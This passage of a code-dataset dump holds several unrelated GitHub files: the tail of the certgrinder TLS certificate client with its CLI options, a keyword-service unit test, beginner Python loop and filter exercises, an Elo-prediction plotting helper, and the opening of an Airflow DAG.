wildcard certificates only support dns-01\n print(\n f'{domain} IN CAA 128 issuewild \"letsencrypt.org; validationmethods=dns-01; accounturi={url}\"'\n )\n print(f'{domain} IN CAA 128 issue \";\"')\n else:\n print(\n f'{domain} IN CAA 128 issue \"letsencrypt.org; validationmethods={self.conf[\"caa-validation-methods\"]}; accounturi={url}\"'\n )\n print(f'{domain} IN CAA 128 issuewild \";\"')\n\n # MAIN METHODS\n\n def periodic(self) -> bool:\n \"\"\"The periodic method performs periodic maintenance tasks.\n\n This method is called by the 'periodic' command, from cron or similar.\n It starts out by sleeping for a random period and then checks certificates and renews as needed.\n \"\"\"\n if self.conf[\"periodic-sleep-minutes\"]:\n assert isinstance(\n self.conf[\"periodic-sleep-minutes\"], int\n ) # make mypy happy\n sleep = random.randint(0, self.conf[\"periodic-sleep-minutes\"])\n logger.debug(f\"Sleeping for {sleep} minutes before doing periodic...\")\n time.sleep(sleep * 60)\n\n # check if we have a valid certificate for this domainset\n if not self.check_certificate():\n # certificate is not valid, get new\n if not self.get_certificate():\n # unable to get new certificate\n logger.error(\n f\"Failed getting a new certificate for domainset: {self.domainset}\"\n )\n return False\n\n # check if we have valid OCSP responses\n if not self.check_ocsp():\n # OCSP response not valid, get new\n if not self.get_ocsp():\n # unable to get new OCSP response\n logger.error(\n f\"Failed getting a new OCSP response for domainset: {self.domainset}\"\n )\n return False\n\n # all good\n return True\n\n def show_paths(self) -> None:\n \"\"\"The ``show paths`` subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n None\n \"\"\"\n msg = {True: \"file found\", False: \"file not found\"}\n logger.info(\n f\"- Showing paths for keytype '{self.keytype}' for domain set: {self.domainset}\"\n )\n logger.info(\n f\"Keypair path: {self.keypair_path} [{msg[os.path.exists(self.keypair_path)]}]\"\n )\n logger.info(f\"CSR path: {self.csr_path} [{msg[os.path.exists(self.csr_path)]}]\")\n logger.info(\n f\"Certificate path: {self.certificate_path} [{msg[os.path.exists(self.certificate_path)]}]\"\n )\n logger.info(\n f\"Chain path: {self.certificate_chain_path} [{msg[os.path.exists(self.certificate_chain_path)]}]\"\n )\n logger.info(\n f\"Issuer certificate path: {self.issuer_path} [{msg[os.path.exists(self.issuer_path)]}]\"\n )\n logger.info(\n f\"Key+chain concat path: {self.concat_path} [{msg[os.path.exists(self.concat_path)]}]\"\n )\n logger.info(\n f\"OCSP response path: {self.ocsp_response_path} [{msg[os.path.exists(self.ocsp_response_path)]}]\"\n )\n\n def check_connection(\n self,\n stdout: typing.Optional[bytes] = None,\n ) -> bool:\n \"\"\"The ``check connection`` subcommand method.\n\n Args:\n stdout: The certgrinderd response to use instead of calling certgrinderd (optional)\n\n Returns:\n None\n \"\"\"\n if stdout is None:\n # call certgrinderd ping command\n stdout = self.run_certgrinderd(stdin=b\"\", command=[\"ping\"])\n\n if not stdout or stdout.decode() != \"pong\\n\":\n logger.error(\n f\"Did not get a pong response in stdout from certgrinderd, got '{stdout!r}' instead\"\n )\n self.error = True\n return False\n\n logger.info(\"Success! 
Got pong response from certgrinderd.\")\n return True\n\n def get_filename(self, hostname: str) -> str:\n \"\"\"Calculate the hostname string to be used for filenames.\n\n Files are named after the ascii idna representation of the first hostname\n in the list (which is also the CN in the subject of the CSR and certificate).\n\n Max filename length on some platforms is 255 bytes, but a hostname could be\n up to 253 bytes (RFC 1035 section 2.3.4), and we need some room for the usage\n and keytype and extension, so we only use the last 230 bytes of the ascii idna\n representation of the hostname for the filename, leaving 25 bytes for metadata.\n\n Args:\n domainset: The list of hostnames\n\n Returns:\n The string to use in filenames\n \"\"\"\n return hostname.encode(\"idna\").decode(\"ascii\")[-230:]\n\n def load_domainset(self, domainset: typing.List[str], keytype: str) -> None:\n \"\"\"Prepare paths and create/load private key.\n\n Args:\n domainset: The list of hostnames to load\n keytype: The keytype to use, \"rsa\" or \"ecdsa\".\n\n Returns:\n None\n \"\"\"\n logger.debug(f\"Loading domainset {domainset} for keytype {keytype}\")\n self.domainset = domainset\n self.keytype = keytype\n assert isinstance(self.conf[\"path\"], str)\n\n # get the hostname to use for filenames\n filename = self.get_filename(domainset[0])\n\n # keypair\n self.keypair_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-keypair.{keytype}.key\"\n )\n logger.debug(f\"keypair path: {self.keypair_path}\")\n\n # CSR\n self.csr_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-request.{keytype}.csr\"\n )\n logger.debug(f\"CSR path: {self.csr_path}\")\n\n # certificate chain\n self.certificate_chain_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-chain.{keytype}.crt\"\n )\n logger.debug(f\"Certificate chain path: {self.certificate_chain_path}\")\n\n # certificate only\n self.certificate_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-certificate.{keytype}.crt\"\n )\n logger.debug(f\"certificate path: {self.certificate_path}\")\n\n # issuer certificate\n self.issuer_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-issuer.{keytype}.crt\"\n )\n logger.debug(f\"issuer path: {self.issuer_path}\")\n\n # concat of privkey + chain\n self.concat_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-concat.{keytype}.pem\"\n )\n logger.debug(\"concat path: %s\" % self.concat_path)\n\n # OCSP response\n self.ocsp_response_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-response.{keytype}.ocsp\"\n )\n logger.debug(\"OCSP response path: %s\" % self.ocsp_response_path)\n\n # warn about legacy paths, remove this check at some point in future\n self.keypair_path_old = os.path.join(\n self.conf[\"path\"], self.domainset[0].encode(\"idna\").decode(\"ascii\")\n )\n if os.path.exists(self.keypair_path_old) and not os.path.exists(\n self.keypair_path\n ):\n logger.error(\n f\"Keypair {self.keypair_path} not found, but the old filename {self.keypair_path_old} was found. 
Please rename files as described in the CHANGELOG.\"\n )\n sys.exit(1)\n\n # finally load or create the keypair\n if os.path.exists(self.keypair_path):\n # load private key\n self.keypair = self.load_keypair(self.keypair_path)\n logger.debug(f\"Loaded {keytype} keypair from {self.keypair_path}\")\n else:\n # create new private key\n self.keypair = self.generate_private_key(keytype=keytype)\n self.save_keypair(self.keypair, self.keypair_path)\n logger.debug(f\"Created new {keytype} keypair, saved to {self.keypair_path}\")\n\n def grind(self, args: argparse.Namespace) -> None:\n \"\"\"Loop over enabled keytypes and domainsets in ``self.conf[\"domain-list\"]`` and call args.method for each.\"\"\"\n logger.debug(f\"Certgrinder {__version__} running\")\n\n if args.method == \"check_connection\":\n # we only need to do this once, and we don't need to load_domainset() first\n getattr(self, args.method)()\n else:\n # loop over keytypes\n kcounter = 0\n assert isinstance(self.conf[\"key-type-list\"], list)\n for keytype in self.conf[\"key-type-list\"]:\n if kcounter == 1 and args.method in [\"show_caa\"]:\n # we dont need to see CAA records once per keytype\n break\n kcounter += 1\n # loop over domains\n dcounter = 0\n assert isinstance(self.conf[\"domain-list\"], list)\n for domainset in self.conf[\"domain-list\"]:\n dcounter += 1\n logger.debug(\n f\"-- Processing keytype {keytype} ({kcounter} of {len(self.conf['key-type-list'])} keytypes) for domainset {dcounter} of {len(self.conf['domain-list'])}: {domainset.split(',')}\"\n )\n # prepare paths and create/load private key\n self.load_domainset(domainset=domainset.split(\",\"), keytype=keytype)\n # run the requested method\n getattr(self, args.method)()\n\n # do we need to run post-renew hooks?\n if self.hook_needed:\n logger.info(\n \"At least one certificate or OCSP response was renewed, running post renew hooks...\"\n )\n self.run_post_renew_hooks()\n\n # are we running in check mode?\n if args.command == \"check\" and self.error:\n logger.error(\n \"Running in check mode and one or more errors were encountered, exit code 1\"\n )\n sys.exit(1)\n\n logger.debug(\"All done, exiting cleanly\")\n sys.exit(0)\n\n\ndef get_parser() -> argparse.ArgumentParser:\n \"\"\"Create and return the argparse object.\"\"\"\n parser = argparse.ArgumentParser(\n description=f\"Certgrinder version {__version__}. See the manpage or ReadTheDocs for more info.\"\n )\n # add topmost subparser for main command\n subparsers = parser.add_subparsers(\n help=\"Command (required)\", dest=\"command\", required=True\n )\n\n # \"check\" command\n check_parser = subparsers.add_parser(\n \"check\",\n help='Use the \"check\" command to check certificates, OCSP responses and TLSA records. Returns exit code 0 if all is well, and 1 if something needs attention.',\n )\n check_subparsers = check_parser.add_subparsers(\n help=\"Specify what to check using one of the available check sub-commands.\",\n dest=\"subcommand\",\n required=True,\n )\n\n # \"check certificate\" subcommand\n check_certificate_parser = check_subparsers.add_parser(\n \"certificate\",\n help=\"Tell certgrinder to check certificate validity for all configured domainsets. 
Returns exit code 1 if any problem is found, exit code 0 if all is well.\",\n )\n check_certificate_parser.set_defaults(method=\"check_certificate\")\n\n # \"check connection\" subcommand\n check_connection_parser = check_subparsers.add_parser(\n \"connection\",\n help=\"Tell certgrinder to check the connection to the certgrinderd server by calling the certgrinderd 'ping' command which should return the string 'pong' if all is well.\",\n )\n check_connection_parser.set_defaults(method=\"check_connection\")\n\n # \"check ocsp\" subcommand\n check_ocsp_parser = check_subparsers.add_parser(\n \"ocsp\",\n help=\"Tell certgrinder to check the OCSP response validity for certificates for all configured domainsets. Returns exit code 1 if any problem is found, exit code 0 if all is well.\",\n )\n check_ocsp_parser.set_defaults(method=\"check_ocsp\")\n\n # \"check tlsa\" subcommand\n check_tlsa_parser = check_subparsers.add_parser(\n \"tlsa\",\n help=\"Tell certgrinder to lookup TLSA records for the given port and protocol in the DNS and compare with what we have locally, for example: 'certgrinder check tlsa 853 tcp'\",\n )\n check_tlsa_parser.set_defaults(method=\"check_tlsa\")\n check_tlsa_parser.add_argument(\n \"tlsa-port\", type=int, help=\"The port of the service, for example 443\"\n )\n check_tlsa_parser.add_argument(\n \"tlsa-protocol\", help=\"The protocol of the service, for example tcp\"\n )\n\n # \"get\" command\n get_parser = subparsers.add_parser(\n \"get\", help='Use the \"get\" command to get certificates and OCSP responses'\n )\n get_subparsers = get_parser.add_subparsers(\n help=\"Specify what to get using one of the available get sub-commands\",\n dest=\"subcommand\",\n required=True,\n )\n\n # \"get certificate\" subcommand\n get_cert_parser = get_subparsers.add_parser(\n \"certificate\",\n help=\"Tell certgrinder to get new certificate(s), regardless of their current state. Rarely needed, use 'periodic' command instead.\",\n )\n get_cert_parser.set_defaults(method=\"get_certificate\")\n\n # \"get ocsp\" subcommand\n get_ocsp_parser = get_subparsers.add_parser(\n \"ocsp\",\n help=\"Tell certgrinder to get OCSP responses for the configured domainset(s). Rarely needed, use 'periodic' command instead.\",\n )\n get_ocsp_parser.set_defaults(method=\"get_ocsp\")\n\n # \"help\" command\n subparsers.add_parser(\"help\", help='The \"help\" command just outputs the usage help')\n\n # \"periodic\" command\n periodic_parser = subparsers.add_parser(\n \"periodic\",\n help='The \"periodic\" command checks certificates and renews them as needed. 
Meant to be run from cron or similar daily.',\n )\n periodic_parser.set_defaults(method=\"periodic\")\n\n # \"show\" command\n show_parser = subparsers.add_parser(\n \"show\",\n help='Use the \"show\" command to show certificates, TLSA records, SPKI pins or configuration.',\n )\n show_subparsers = show_parser.add_subparsers(\n help=\"Specify what to show using one of the available show sub-commands\",\n dest=\"subcommand\",\n required=True,\n )\n\n # \"show certificate\" subcommand\n show_certificate_parser = show_subparsers.add_parser(\n \"certificate\", help=\"Tell certgrinder to output information about certificates.\"\n )\n show_certificate_parser.set_defaults(method=\"show_certificate\")\n\n # \"show configuration\" subcommand\n show_subparsers.add_parser(\n \"configuration\", help=\"Tell certgrinder to output the current configuration\"\n )\n\n # \"show paths\" subcommand\n show_paths_parser = show_subparsers.add_parser(\n \"paths\", help=\"Tell certgrinder to output the paths used\"\n )\n show_paths_parser.set_defaults(method=\"show_paths\")\n\n # \"show ocsp\" subcommand\n show_ocsp_parser = show_subparsers.add_parser(\n \"ocsp\", help=\"Tell certgrinder to output information about OCSP responses.\"\n )\n show_ocsp_parser.set_defaults(method=\"show_ocsp\")\n\n # \"show spki\" subcommand\n show_spki_parser = show_subparsers.add_parser(\n \"spki\",\n help=\"Tell certgrinder to generate and print the pin-sha256 spki pins for the public keys it manages.\",\n )\n show_spki_parser.set_defaults(method=\"show_spki\")\n\n # \"show tlsa\" subcommand\n show_tlsa_parser = show_subparsers.add_parser(\n \"tlsa\",\n help=\"Use the 'show tlsa' sub-command to tell certgrinder to generate and print TLSA records for the given service, for example: 'certgrinder show tlsa 443 tcp'\",\n )\n show_tlsa_parser.set_defaults(method=\"show_tlsa\")\n show_tlsa_parser.add_argument(\n \"tlsa-port\", type=int, help=\"The port of the service, for example 443\"\n )\n show_tlsa_parser.add_argument(\n \"tlsa-protocol\", help=\"The protocol of the service, for example tcp\"\n )\n\n # \"show caa\" subcommand\n show_caa_parser = show_subparsers.add_parser(\n \"caa\",\n help=\"Use the 'show caa' sub-command to tell certgrinder to output a CAA record suitable for the specified domainset(s).\",\n )\n show_caa_parser.set_defaults(method=\"show_caa\")\n\n # \"version\" command\n subparsers.add_parser(\n \"version\", help='The \"version\" command just outputs the version of Certgrinder'\n )\n\n # optional arguments\n parser.add_argument(\n \"-a\",\n \"--alternate-chain\",\n dest=\"alternate-chain\",\n action=\"store_true\",\n help=\"Use alternate chain. For production this means using the short chain with 1 intermediate signed by 'ISRG Root X1' instead of using the long chain with 2 intermediates signed by 'DST Root CA X3'. For staging it means using 'Fake LE Root X2' (1 intermediate) instead of the usual 'Fake LE Root X1' (2 intermediates).\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--certgrinderd\",\n dest=\"certgrinderd\",\n help=\"The command to reach the certgrinderd server, will get the input (CSR or cert chain) on stdin. Usually something like 'ssh certgrinderd@server -T'\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--caa-validation-methods\",\n required=False,\n help=\"The ACME validation methods to include when outputting CAA records. 
Default: dns-01,http-01\",\n dest=\"caa-validation-methods\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--cert-renew-threshold-days\",\n dest=\"cert-renew-threshold-days\",\n type=int,\n help=\"A certificate is renewed when it has less than this many days of lifetime left. Default: `30`\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-c\",\n \"--config-file\",\n dest=\"config-file\",\n help=\"The path to the certgrinder.yml config file to use\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-d\",\n \"--debug\",\n action=\"store_const\",\n dest=\"log-level\",\n const=\"DEBUG\",\n help=\"Debug mode. Equal to setting --log-level=DEBUG.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-D\",\n \"--domain-list\",\n action=\"append\",\n dest=\"domain-list\",\n help=\"Comma separated list of domains for a certificate. Can be specified multiple times.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--invalid-ca-cn-list\",\n action=\"append\",\n dest=\"invalid-ca-cn-list\",\n help=\"The CommonName of an issuer (CA intermediate) to consider invalid. Can be specified multiple times.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-l\",\n \"--log-level\",\n dest=\"log-level\",\n choices=[\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"CRITICAL\"],\n help=\"Logging level. One of DEBUG, INFO, WARNING, ERROR, CRITICAL. Defaults to INFO.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-k\",\n \"--key-type-list\",\n action=\"append\",\n dest=\"key-type-list\",\n choices=[\"rsa\", \"ecdsa\"],\n help=\"The keytypes to enable. Valid values are 'rsa' and 'ecdsa'. Can be specified multiple times. Defaults to both rsa and ecdsa.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-n\",\n \"--name-server\",\n dest=\"name-server\",\n help=\"Tell certgrinder to use this DNS server IP to lookup TLSA records. Only relevant with -c / --checktlsa. Only v4/v6 IPs, no hostnames.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--now\",\n dest=\"periodic-sleep-minutes\",\n action=\"store_const\",\n const=0,\n help=\"Run periodic command without delay. Equal to setting --periodic-sleep-minutes 0.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-o\",\n \"--ocsp-renew-threshold-percent\",\n dest=\"ocsp-renew-threshold-percent\",\n type=int,\n choices=range(0, 101),\n metavar=\"OCSP-RENEW-THRESHOLD-PERCENT\",\n help=\"An integer between 0 and 100 specifying the amount of time in percent between ``produced_at`` and ``next_update`` which must have passed before an OCSP response is considered too old. Defaults to 50.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--path\",\n dest=\"path\",\n help=\"Tell certgrinder to use the specified directory for keys, CSRs and certificates. The directory must exist and be writeable by the user running certgrinder.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--periodic-sleep-minutes\",\n dest=\"periodic-sleep-minutes\",\n type=int,\n help=\"Tell certgrinder to sleep for a random number of minutes between 0 and this number before doing anything when the periodic command is used. 
Set to 0 to disable sleeping.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-p\",\n \"--pid-dir\",\n dest=\"pid-dir\",\n help=\"The directory to store the PID file in\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--post-renew-hooks\",\n action=\"append\",\n dest=\"post-renew-hooks\",\n help=\"The list of commands to run after one or more certificates are renewed. Most such commands will need root access to run, remember to prefix the command with 'sudo' as needed. Can be specified multiple times. Default: `None`\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--post-renew-hooks-dir\",\n dest=\"post-renew-hooks-dir\",\n help=\"Path to a folder containing executables to run after one or more certificates or OCSP responses are renewed. These will execute under the regular certgrinder user uid, so make sure to use sudo/doas in scripts or suid executables as needed. Default: `None`\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--post-renew-hooks-dir-runner\",\n dest=\"post-renew-hooks-dir-runner\",\n help=\"Path to an executable like sudo to be used to run each of the executables in the post renew hooks dir. Default: `None`\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-q\",\n \"--quiet\",\n action=\"store_const\",\n dest=\"log-level\",\n const=\"WARNING\",\n help=\"Quiet mode. No output at all if there is nothing to do, and no errors are encountered. Equal to setting --log-level=WARNING.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-s\",\n \"--staging\",\n dest=\"staging\",\n action=\"store_true\",\n help=\"Staging mode. Sets --acme-server-url https://acme-staging-v02.api.letsencrypt.org/directory and --invalid-ca-cn-list empty. Use this while playing around to avoid hitting rate limits!\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--syslog-facility\",\n dest=\"syslog-facility\",\n help=\"The syslog facility to use. Set this and syslog-socket to enable logging to syslog.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--syslog-socket\",\n dest=\"syslog-socket\",\n help=\"The syslog socket to connect to. Set this and syslog-facility to enable logging to syslog.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--tlsa-port\",\n dest=\"tlsa-port\",\n type=int,\n help=\"The service port number (like 443) for TLSA operations.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--tlsa-protocol\",\n dest=\"tlsa-protocol\",\n help=\"The service protocol (like tcp) for TLSA operations.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"--tlsa-type-list\",\n action=\"append\",\n dest=\"tlsa-type-list\",\n choices=[\"310\", \"311\", \"312\"],\n help=\"Enables a TLSA type for TLSA operations. 
Can be specified multiple times.\",\n default=argparse.SUPPRESS,\n )\n parser.add_argument(\n \"-v\",\n \"--version\",\n dest=\"version\",\n action=\"store_true\",\n help=\"Show version and exit.\",\n default=argparse.SUPPRESS,\n )\n return parser\n\n\ndef parse_args(\n mockargs: typing.Optional[typing.List[str]] = None,\n) -> typing.Tuple[argparse.ArgumentParser, argparse.Namespace]:\n \"\"\"Create an argparse monster and parse mockargs or sys.argv[1:].\"\"\"\n parser = get_parser()\n args = parser.parse_args(mockargs if mockargs else sys.argv[1:])\n return parser, args\n\n\ndef main(mockargs: typing.Optional[typing.List[str]] = None) -> None:\n \"\"\"Initialise script and ``Certgrinder()`` object, then call ``certgrinder.grind()``.\n\n Parse command-line arguments, read config file if needed, configure logging,\n and then call ``certgrinder.grind()`` method.\n \"\"\"\n # get parser and parse args\n parser, args = parse_args(mockargs)\n\n # handle a couple of special cases before reading config\n if args.command == \"version\" or hasattr(args, \"version\"):\n print(f\"Certgrinder version {__version__}\")\n sys.exit(0)\n if args.command == \"help\":\n parser.print_help()\n sys.exit(0)\n\n # read and parse the config file\n if hasattr(args, \"config-file\"):\n with open(getattr(args, \"config-file\")) as f:\n try:\n config = yaml.load(f, Loader=yaml.SafeLoader)\n except Exception:\n logger.exception(\n f\"Unable to parse YAML config file {getattr(args, 'config-file')} - bailing out.\"\n )\n sys.exit(1)\n else:\n # we have no config file\n config = {}\n\n # update file config (if any) with command-line arguments,\n # so they take precedence over config file configuration\n config.update(vars(args))\n\n # remove command and subcommand (part of argparse internals)\n if \"command\" in config:\n del config[\"command\"]\n if \"subcommand\" in config:\n del config[\"subcommand\"]\n\n # configure certgrinder\n certgrinder = Certgrinder()\n certgrinder.configure(userconfig=config)\n\n # if the command is \"show configuration\" just output certgrinder.conf and exit now\n if args.command == \"show\" and args.subcommand == \"configuration\":\n logger.info(\"Current certgrinder configuration:\")\n pprint(certgrinder.conf)\n sys.exit(0)\n\n # call main method\n certgrinder.grind(args)\n\n\ndef init() -> None:\n \"\"\"This is here just as a testable way of calling main().\"\"\"\n if __name__ == \"__main__\":\n with PidFile(\"certgrinder\"):\n main()\n\n\ninit()\n","repo_name":"tykling/certgrinder","sub_path":"client/certgrinder/certgrinder.py","file_name":"certgrinder.py","file_ext":"py","file_size_in_byte":89402,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"94"} +{"seq_id":"1479158206","text":"import os\nfrom unittest import TestCase\nfrom unittest.mock import MagicMock\n\nfrom dataforseo_sdk.keywords.keyword_service import KeywordService\n\nRANKED_KEYWORDS_RESPONSE_FILE = os.path.realpath(\n os.path.join(\n os.path.realpath(__file__),\n \"..\",\n \"data\",\n \"api.dataforseo.com.v3-dataforseo_labs-ranked_keywords-live.20220225T163613.078371.json\",\n )\n)\n\nTEST_API_USERNAME = \"username\"\nTEST_API_PASSWORD = \"api_key\"\n\n\nclass TestKeywordService(TestCase):\n def read_test_data_file(self, file_name):\n with open(file_name, \"r\", encoding=\"utf-8\") as fh:\n return fh.read()\n\n def test_ranked_keywords(self):\n ranked_keywords_test_data = self.read_test_data_file(\n RANKED_KEYWORDS_RESPONSE_FILE\n )\n mock_rest_client = MagicMock()\n 
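        # A minimal, hypothetical sketch of the collaborator being mocked here
        # (the real KeywordService in dataforseo_sdk may differ): this test only
        # assumes the service forwards the call to the injected client, e.g.
        #
        #     class KeywordService:
        #         def __init__(self, client):
        #             self._client = client
        #
        #         def ranked_keywords(self, target_domain):
        #             # intercepted by the MagicMock configured below
        #             return self._client.post(...)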
mock_rest_client.post.return_value = ranked_keywords_test_data\n\n target_domain = \"afishingaddiction.com\"\n keyword_service = KeywordService(client=mock_rest_client)\n keyword_service._location_code = 2840\n keyword_service._language_code = \"en\"\n\n ranked_keywords = keyword_service.ranked_keywords(target_domain=target_domain)\n\n assert ranked_keywords == ranked_keywords_test_data\n","repo_name":"lieutdan13/dataforseo_sdk","sub_path":"tests/keywords/test_keyword_service.py","file_name":"test_keyword_service.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"70720517430","text":"is_learning = True\nwhile is_learning:\n print(\"learning\")\n is_learning = False\n \nis_learning = True\nwhile is_learning:\n print(\"learning\")\n is_learning = input(\"are they still learning\")\n \nis_learning = True\nwhile is_learning:\n print(\"You are learning\")\n user_input = input(\"They are learning\")\n is_learning == user_input == \"Yes\"\n \nuser_input = input(\"Do you wish to run the program? (yes/no)\")\n\nwhile user_input == \"yes\":\n print(\"We are running\")\n user_input = input(\"Do you wish to run the program?(yes/no)\")\n\nprint(\"We stopped running\")\n \nuser_input = int(input(\"Enter number\"))\nwhile user_input < 10:\n print(\"Your number was less than 10.\")\n user_input = int(input(\"select another\"))\n \nprint(\"Your number was at least 10.\")\n\nq = input(\"enter q\")\np = input(\"enter p\")\nuser_input = input(\"enter p or q\")\nwhile user_input != q:\n if user_input == p:\n print(\"Hello\")\n user_input = input(\"enter p or q\")\n\ntarget_number = 40\nguess = int(input(\"enter number\"))\nwhile guess != target_number:\n print(\"wrong\")\n if guess > target_number:\n print(\"High\")\n else:\n print(\"low\")\n guess = int(input(\"enter number\"))\nprint(\"you select a successfully\")\n\nsample_string = \"Python\"\nfor string in sample_string:\n if string == \"o\":\n continue\n print(string)\n \n \n \n\n","repo_name":"amar13617/python_fundamentals","sub_path":"while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"32915480060","text":"def function(number):\n even_numbers_list = [0, 2, 4, 6, 8]\n if number in even_numbers_list:\n return True\n else:\n return False\n\n\ndef int_function(integer):\n if isinstance(integer, int):\n return True\n else:\n return False\n\n\nnumbers_list = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nfiltered_list = list(filter(function, numbers_list))\nprint(filtered_list)\n\nprint(\"Enter numbers : \")\n# integer_list = list(input().split())\nfilter_list = list(filter(int_function, list(map(int, input().split()))))\nprint(filter_list)\n\nprint(\"Enter integers : \")\nint_filter_list = list(filter(int, list(map(int, input().split()))))\nprint(int_filter_list)\n\nsample_list = [\"fjsd\", \"dsfklj\", 5.9, 0, 87]\nfilter_sample_list = list(filter(int_function, sample_list))\nprint(filter_sample_list)\n","repo_name":"lokeshsonawane95/python_map_filter_reduce","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74686011828","text":"import torch\nimport matplotlib.pyplot as plt\n\n\ndef plot_loss(loss_graph):\n # Visualize the loss as the network trained\n # Should be a downward trend\n 
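    # Hypothetical usage (the real training loop lives elsewhere): append one
    # aggregated scalar loss per epoch, then hand the list over, e.g.
    #
    #     history = []
    #     for epoch in range(num_epochs):
    #         history.append(epoch_loss)  # assumed per-epoch aggregate
    #     plot_loss(history)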
plt.plot(loss_graph)\n plt.title(\"Training loss plot: Rating Ranges model\")\n plt.xlabel(\"Epoch\")\n plt.xticks([i for i in range(0, len(loss_graph) + 1, 2)])\n plt.ylabel(\"Loss\")\n plt.savefig(\"temp/loss_plot.png\")\n\n\ndef get_cutoff_value(tensor, percentage):\n cutoff = int(percentage * len(tensor))\n cutoff_value, _ = torch.kthvalue(tensor, cutoff)\n return cutoff_value.item()\n\n\ndef compare_results(predictions, y_test):\n error = torch.abs(predictions - y_test)\n print(f\"Mean error: {error.mean()}\")\n fiftieth_percentile = get_cutoff_value(error, 0.5)\n print(f\"50th percentile: {fiftieth_percentile}\")\n ninetieth_percentile = get_cutoff_value(error, 0.9)\n print(f\"90th percentile: {ninetieth_percentile}\")\n\n plot_predictions(predictions, y_test, fiftieth_percentile,\n ninetieth_percentile)\n\n\ndef plot_predictions(predictions, y_test, fifty=None, ninety=None):\n fig, axs = plt.subplots(1, 1)\n samples = 1500\n axs.plot(y_test[:samples], predictions[:samples], 'o', label=\"Predicted vs Real\")\n\n # the closer to this line the better\n axs.plot([800, 2800], [800, 2800], 'r-', label=\"Perfect prediction\")\n axs.plot([800, 2800], [800 + fifty, 2800 + fifty],\n 'g--', label=\"50% of data\")\n # these two lines show acceptable error (200 elo)\n axs.plot([800, 2800], [800 - fifty, 2800 - fifty], 'g--', label=\"\")\n\n axs.plot([800, 2800], [800 + ninety, 2800 + ninety],\n 'm--', label=\"90% of data\")\n axs.plot([800, 2800], [800 - ninety, 2800 - ninety], 'm--',\n label=\"\") # these two lines encompass 90% of the data\n\n axs.set_title(f\"Real vs Predicted\\nRating Ranges model\")\n\n axs.set_xlabel(\"Real\")\n axs.set_ylabel(\"Predicted\")\n\n axs.set_xlim(600, 3000)\n axs.set_ylim(600, 3000)\n\n axs.grid()\n axs.legend()\n\n fig.savefig(\"temp/predictions.png\")\n plt.show()","repo_name":"HliasOuzounis/Ai-Guess-the-elo","sub_path":"elo_ai/helper_functions/plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"197529227","text":"from __future__ import absolute_import\n\nimport os\nfrom datetime import timedelta\n\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.contrib.operators.bigquery_to_gcs import BigQueryToCloudStorageOperator\nfrom dependencies import airflow_utils\nfrom dependencies.airflow_utils import get_ds_month, get_ds_year, get_ds_day, default_args\n\n# The goal of this DAG is to perform a complete pull of police unit assignment data from\n# the InTime API. 
